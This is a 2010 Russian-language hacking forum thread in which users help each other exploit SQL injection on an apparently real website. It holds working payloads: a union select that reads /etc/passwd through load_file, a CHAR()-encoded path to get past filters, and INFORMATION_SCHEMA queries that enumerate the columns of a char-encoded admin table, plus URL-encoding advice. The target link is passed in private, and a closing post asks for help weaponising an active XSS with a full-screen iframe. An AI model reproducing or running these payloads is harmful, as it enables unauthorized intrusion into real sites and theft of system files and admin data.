06.05.2010, 19:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pinch
http://test/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4--
не катит.
Значит у меня однозначно нет прав?
Попробуй
load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))
|
|
|
06.05.2010, 19:23
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от Konqi
Попробуй
load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))
Из прошлого запроса видно что ковычка не фильтруется.
|
|
|
|
06.05.2010, 19:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от kfor
а если без топ 1 попробовать что выводит?
тот же результат
Сообщение от pinch
надо так:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
а можно без url encode?
Последний раз редактировалось Konqi; 06.05.2010 в 19:14..
|
|
|
|
06.05.2010, 19:13
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)+char(98)+char(1 08)+char(95)+char(103)+char(114)+char(111)+char(11 7)+char(112)+char(95)+char(97)+char(100)+char(109) +char(105)+char(110))--
|
|
|
|
06.05.2010, 19:15
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
2 pinch
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))--
syntaxe incorrecte vers 'char'.
|
|
|
|
06.05.2010, 19:30
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))-- syntaxe incorrecte vers 'char'.
на encode не пробовал
заменив "+" на "%2B"
скорее всего причина в этом
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
|
|
|
|
06.05.2010, 19:36
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
2 pinch
nea,тот же результат =(
|
|
|
|
06.05.2010, 19:39
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
интересно может ссылку дашь....
|
|
|
|
06.05.2010, 20:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от pinch
интересно может ссылку дашь....
в личку
|
|
|
|
06.05.2010, 20:03
|
|
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
С нами:
9015797
Репутация:
116
|
|
А мне кто поможет?
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
